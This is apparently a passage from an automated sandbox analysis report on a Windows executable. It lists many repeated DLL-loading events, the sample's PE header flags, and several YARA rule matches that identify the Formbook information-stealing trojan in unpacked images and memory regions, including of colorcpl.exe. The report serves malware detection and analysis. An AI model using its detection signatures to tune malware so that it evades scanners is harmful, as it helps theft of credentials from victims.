              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeSection loaded: ??.dllJump to behavior
              Source: Fpopgapwdcgvxn.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 3.2.colorcpl.exe.68b0000.1.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 3.2.colorcpl.exe.68b0000.1.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 3.2.colorcpl.exe.68b0000.1.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 12.2.colorcpl.exe.65f0000.1.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 12.2.colorcpl.exe.65f0000.1.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 12.2.colorcpl.exe.65f0000.1.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 3.2.colorcpl.exe.68b0000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 3.2.colorcpl.exe.68b0000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 3.2.colorcpl.exe.68b0000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 12.2.colorcpl.exe.65f0000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 12.2.colorcpl.exe.65f0000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 12.2.colorcpl.exe.65f0000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
